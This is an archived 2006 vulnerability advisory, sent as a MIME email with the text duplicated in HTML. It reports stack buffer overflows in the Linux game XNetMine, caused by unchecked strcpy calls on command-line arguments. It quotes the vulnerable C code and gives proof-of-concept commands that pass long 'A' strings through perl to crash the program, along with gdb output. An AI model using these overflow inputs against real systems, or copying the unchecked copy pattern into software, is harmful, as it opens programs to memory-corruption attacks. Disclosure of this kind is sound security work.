Home / exploits XNetMine.txt
Posted on 21 October 2006
This is a multi-part message in MIME format. --------------070909050408080804050008 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit // Vendor: Martin Bauer Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz *Vulnerable code:* -- line: 672/676 if (strncmp("-PortNumber",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(Port,&text[11]); } -- line: 677/682 if (strncmp("-Name",argv[t+1],5)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(User,&text[5]); } -- line: 683/688 if (strncmp("-ServerName",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(ServerName,&text[11]); } -- *Proof of concept:* -- federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'` Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:"" Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:31337 Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" Segmentation fault -- *Debug information:* -- (gdb) p $eip $1 = (void (*)()) 0x804a862 (gdb) stepi Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. SIGSEGV 0x0804a862 in main () -- federico federico@plugs.it / http://defsol.plugs.it/ // --------------070909050408080804050008 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> <title></title> </head> <body bgcolor="#ffffff" text="#000000"> <i><font><i> <pre>Vendor: Martin Bauer Software: <a class="moz-txt-link-freetext" href="http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz">http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz</a> <b>Vulnerable code:</b> -- line: 672/676 if (strncmp("-PortNumber",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(Port,&text[11]); } -- line: 677/682 if (strncmp("-Name",argv[t+1],5)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(User,&text[5]); } -- line: 683/688 if (strncmp("-ServerName",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(ServerName,&text[11]); } -- <b>Proof of concept:</b> -- federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'` Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:"" Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:31337 Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" Segmentation fault -- <b>Debug information:</b> -- (gdb) p $eip $1 = (void (*)()) 0x804a862 <main+753> (gdb) stepi Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. SIGSEGV 0x0804a862 in main () -- federico <a class="moz-txt-link-abbreviated" href="mailto:federico@plugs.it">federico@plugs.it</a> / <a class="moz-txt-link-freetext" href="http://defsol.plugs.it/">http://defsol.plugs.it/</a> </main+753></pre> </i></font></i> </body> </html> --------------070909050408080804050008--
